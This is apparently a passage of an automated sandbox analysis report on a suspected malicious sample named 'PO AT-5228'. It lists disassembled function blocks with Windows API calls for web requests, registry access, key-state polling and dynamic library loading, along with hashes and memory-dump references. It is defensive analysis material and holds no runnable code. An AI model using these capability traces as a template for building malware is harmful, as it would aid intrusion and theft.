                                                                                        • Opcode Fuzzy Hash: be50191fc8087afc9499d2501acd8fe0796b85d507e1cd7caf132694d90d8b14
                                                                                        • Instruction Fuzzy Hash: 0D21D076900108AFDB04ABA4D886DFE7BF9DF19350B1042B9F065A71E0DB685D0A9760
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B6522F
                                                                                        • _wcscpy.LIBCMT ref: 00B65283
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B65293
                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BD3CB0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                        • String ID: Line:
                                                                                        • API String ID: 1053898822-1585850449
                                                                                        • Opcode ID: a1210c222cd6b619b9563797f68fc19b8d6999b994620cc2bb423a30bebf96b0
                                                                                        • Instruction ID: ba531a0e5d108324b9ddf93a7b3c3a0abd30a543c4d81566748ac90ad053c3b5
                                                                                        • Opcode Fuzzy Hash: a1210c222cd6b619b9563797f68fc19b8d6999b994620cc2bb423a30bebf96b0
                                                                                        • Instruction Fuzzy Hash: 3931E271408744AFC330EB60DC42FDF77E8AF54300F04456EF98992191EBB8A659CB96
                                                                                        APIs
                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BB4401
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BB4427
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BB4457
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BB449E
                                                                                          • Part of subcall function 00BB5052: GetLastError.KERNEL32(?,?,00BB43CC,00000000,00000000,00000001), ref: 00BB5067
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                        • String ID:
                                                                                        • API String ID: 1951874230-3916222277
                                                                                        • Opcode ID: 51d4889384b6ec5effe560dba4132d0d087b087e47d39bd10d3f9c971a0ef7c5
                                                                                        • Instruction ID: 03ee325170e1168285be513b144664f55677b2efed1112bc7bad8cccfbb806ac
                                                                                        • Opcode Fuzzy Hash: 51d4889384b6ec5effe560dba4132d0d087b087e47d39bd10d3f9c971a0ef7c5
                                                                                        • Instruction Fuzzy Hash: E6216AB2600208BFE721AB548CC5FFBBAECFB48748F10855AF10996241EFA48D059761
                                                                                        APIs
                                                                                          • Part of subcall function 00B7D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B7D1BA
                                                                                          • Part of subcall function 00B7D17C: GetStockObject.GDI32(00000011), ref: 00B7D1CE
                                                                                          • Part of subcall function 00B7D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7D1D8
                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BC915C
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00BC9163
                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BC9178
                                                                                        • DestroyWindow.USER32(?), ref: 00BC9180
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 4146253029-1011021900
                                                                                        • Opcode ID: 53e2733f7a56bfe3faec39042fa0288fd70be5f5943b91c467dd69f0a92fe8cb
                                                                                        • Instruction ID: 9e4aac4a45e21b240bd284227bfc492a03b3bb9ce1d877cfd85cd6f220abd8e4
                                                                                        • Opcode Fuzzy Hash: 53e2733f7a56bfe3faec39042fa0288fd70be5f5943b91c467dd69f0a92fe8cb
                                                                                        • Instruction Fuzzy Hash: B7218B71200206BFFF204E649C8AFBA37E9EF99364F19069CF914A7190C771DC52A764
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00BA9588
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BA95B9
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00BA95CB
                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00BA9605
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: 187b7c1abf0d9f2d0f4086d92fd737d1f48d512ba9597cab6f34c2b109b75adf
                                                                                        • Instruction ID: 1c145a2ba8767eeab94aebda07c494122a21f61a56f6435ff2558a8f01061a77
                                                                                        • Opcode Fuzzy Hash: 187b7c1abf0d9f2d0f4086d92fd737d1f48d512ba9597cab6f34c2b109b75adf
                                                                                        • Instruction Fuzzy Hash: 04218170904305AFDB219F25DC46A9E77F4EF56720F204A59F9A1DB2D0DB70D940EB10
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00BA9653
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BA9683
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00BA9694
                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00BA96CE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: b97cfccc5a12369900bbd99e5e7adaff5366198ec9380637c1e6083fb9951000
                                                                                        • Instruction ID: 0a0704c03c8347e90aba82071e43ccb5bc65ae01a42269e2c6b84dbed798f4c2
                                                                                        • Opcode Fuzzy Hash: b97cfccc5a12369900bbd99e5e7adaff5366198ec9380637c1e6083fb9951000
                                                                                        • Instruction Fuzzy Hash: D921AF716042059FDB249F6DDC44E9A77E8EF47720F200A99FAA1E72D0EBB09841EB10
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00BADB0A
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00BADB5E
                                                                                        • __swprintf.LIBCMT ref: 00BADB77
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00BFDC00), ref: 00BADBB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                        • String ID: %lu
                                                                                        • API String ID: 3164766367-685833217
                                                                                        • Opcode ID: 2e841b5e5ade40acfa99953b23cfe7f5eb99cc08f2552f442bc3681ca4debb6e
                                                                                        • Instruction ID: ed8be3cb8d2ce943605e4d8853ebc8a7ad777bc511bc2339e0e278d3a480e1b0
                                                                                        • Opcode Fuzzy Hash: 2e841b5e5ade40acfa99953b23cfe7f5eb99cc08f2552f442bc3681ca4debb6e
                                                                                        • Instruction Fuzzy Hash: CA219575600148AFCB10EFA4CD85EAEBBF8EF49704B0040A9F509EB261DB71EE41CB61
                                                                                        APIs
                                                                                          • Part of subcall function 00B9C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B9C84A
                                                                                          • Part of subcall function 00B9C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B9C85D
                                                                                          • Part of subcall function 00B9C82D: GetCurrentThreadId.KERNEL32 ref: 00B9C864
                                                                                          • Part of subcall function 00B9C82D: AttachThreadInput.USER32(00000000), ref: 00B9C86B
                                                                                        • GetFocus.USER32 ref: 00B9CA05
                                                                                          • Part of subcall function 00B9C876: GetParent.USER32(?), ref: 00B9C884
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00B9CA4E
                                                                                        • EnumChildWindows.USER32(?,00B9CAC4), ref: 00B9CA76
                                                                                        • __swprintf.LIBCMT ref: 00B9CA90
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                        • String ID: %s%d
                                                                                        • API String ID: 3187004680-1110647743
                                                                                        • Opcode ID: 06db0a007c29b3d64883e8cd5e143106ef1600381332e0694cdd71ccd1d95bc4
                                                                                        • Instruction ID: f0d12b6bc4a426302111c5080dffbd5bebfa7566520ef2db0c123a8732e6a735
                                                                                        • Opcode Fuzzy Hash: 06db0a007c29b3d64883e8cd5e143106ef1600381332e0694cdd71ccd1d95bc4
                                                                                        • Instruction Fuzzy Hash: C6117FB56002096BDF11BFA48CC5FA93BA8AB44714F0080B6FA09AA196CB749945DB70
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BC19F3
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BC1A26
                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00BC1B49
                                                                                        • CloseHandle.KERNEL32(?), ref: 00BC1BBF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2364364464-0
                                                                                        • Opcode ID: d2b2e1c28314660125b76c7c04884e54f943dbef1c17f958c3a85d9be70959a9
                                                                                        • Instruction ID: c05c285b07016f267ec6a4dbffbc758e564e73368da6cdd7109a555e9778c451
                                                                                        • Opcode Fuzzy Hash: d2b2e1c28314660125b76c7c04884e54f943dbef1c17f958c3a85d9be70959a9
                                                                                        • Instruction Fuzzy Hash: 3E814070600214ABDF119F68C896BADBBE5EF05720F14C899F919BF382D7B5AD418B90
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00BA1CB4
                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00BA1D26
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00BA1D81
                                                                                        • VariantClear.OLEAUT32(?), ref: 00BA1DF8
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BA1E26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                        • String ID:
                                                                                        • API String ID: 4136290138-0
                                                                                        • Opcode ID: 3dab43a1b5c8b73ad1ae2515ec6a6c49769e33d0d395f28b1d72582f21cdbd6f
                                                                                        • Instruction ID: 32b88e76bc94c640c882d164766e0a4e64c06b3ada03a286230b9bc4d4dab2ce
                                                                                        • Opcode Fuzzy Hash: 3dab43a1b5c8b73ad1ae2515ec6a6c49769e33d0d395f28b1d72582f21cdbd6f
                                                                                        • Instruction Fuzzy Hash: FC5139B5A00209AFDB14CF58C880EAAB7F8FF4D314F158569E959DB341D730EA51CBA0
                                                                                        APIs
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00BC06EE
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00BC077D
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00BC079B
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00BC07E1
                                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 00BC07FB
                                                                                          • Part of subcall function 00B7E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00BAA574,?,?,00000000,00000008), ref: 00B7E675
                                                                                          • Part of subcall function 00B7E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00BAA574,?,?,00000000,00000008), ref: 00B7E699
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 327935632-0
                                                                                        • Opcode ID: 41e33582636f297b7f1659f7e54c2806dc81c99934efdd0f97fa699493738e5e
                                                                                        • Instruction ID: 40c667a339193199949646d4266f43ff96aab9d5a1485fb9185d441194ec6262
                                                                                        • Opcode Fuzzy Hash: 41e33582636f297b7f1659f7e54c2806dc81c99934efdd0f97fa699493738e5e
                                                                                        • Instruction Fuzzy Hash: C2512875A00205DFCB04EFA8C491EADB7F5FF58310B04809AE956AB352DB74ED45CB90
                                                                                        APIs
                                                                                          • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC2EEF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BC2F2E
                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BC2F75
                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00BC2FA1
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BC2FAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3740051246-0
                                                                                        • Opcode ID: 7babf5138a77cf5b60d2fff778b112f74eba72fca071c60c8b853108108209ae
                                                                                        • Instruction ID: 06378c782c3ce1b0a988be8de46b77ebdcd74b1ad72934375d9aa1a5f6fa6e02
                                                                                        • Opcode Fuzzy Hash: 7babf5138a77cf5b60d2fff778b112f74eba72fca071c60c8b853108108209ae
                                                                                        • Instruction Fuzzy Hash: 81515B71608208AFD704EF64C891F6ABBF9FF88304F0488ADF595972A1DB75E905CB52
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 69562106e0e1f58a1253a568c315bb36b5fac0fddedb246b18ac30c6d7bb04d1
                                                                                        • Instruction ID: 5f6d484c55f138b82df38c42cf480d7c04ffa9a898dba7cab3444893f3a5225c
                                                                                        • Opcode Fuzzy Hash: 69562106e0e1f58a1253a568c315bb36b5fac0fddedb246b18ac30c6d7bb04d1
                                                                                        • Instruction Fuzzy Hash: 6F41B679A00245AFC720DF68CC84FA97FE4EB29310F1502B9F95EA72E1C770AD41D690
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00BB12B4
                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00BB12DD
                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00BB131C
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00BB1341
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00BB1349
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1389676194-0
                                                                                        • Opcode ID: 63aa0a389361f6903db3206860f139552a27ff41844c1c7c6beb4d4613e14c82
                                                                                        • Instruction ID: 0ba1b6b82e283106eca28cd52ba11477a7b4e33fc884a6cdde457285fc28d09f
                                                                                        • Opcode Fuzzy Hash: 63aa0a389361f6903db3206860f139552a27ff41844c1c7c6beb4d4613e14c82
                                                                                        • Instruction Fuzzy Hash: 06410B35A00505DFDF01EF64C991AAEBBF9FF08310B1480A9E90AAB361DB75ED01DB55
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(000000FF), ref: 00B7B64F
                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 00B7B66C
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00B7B691
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00B7B69F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID:
                                                                                        • API String ID: 4210589936-0
                                                                                        • Opcode ID: 0691029a1799f643bfcc0e7272c00d836cb1f128351fcd76aa557b114fec8204
                                                                                        • Instruction ID: 81d08ac24640d9663d051e40738990a61474b4cd4cf65daa8a6cc32843aaf7db
                                                                                        • Opcode Fuzzy Hash: 0691029a1799f643bfcc0e7272c00d836cb1f128351fcd76aa557b114fec8204
                                                                                        • Instruction Fuzzy Hash: B3415B35604119BFCF159F64C884FE9FBF4FB05324F20839AE86996290DB30A994DFA1
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B9B369
                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00B9B413
                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B9B41B
                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00B9B429
                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B9B431
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
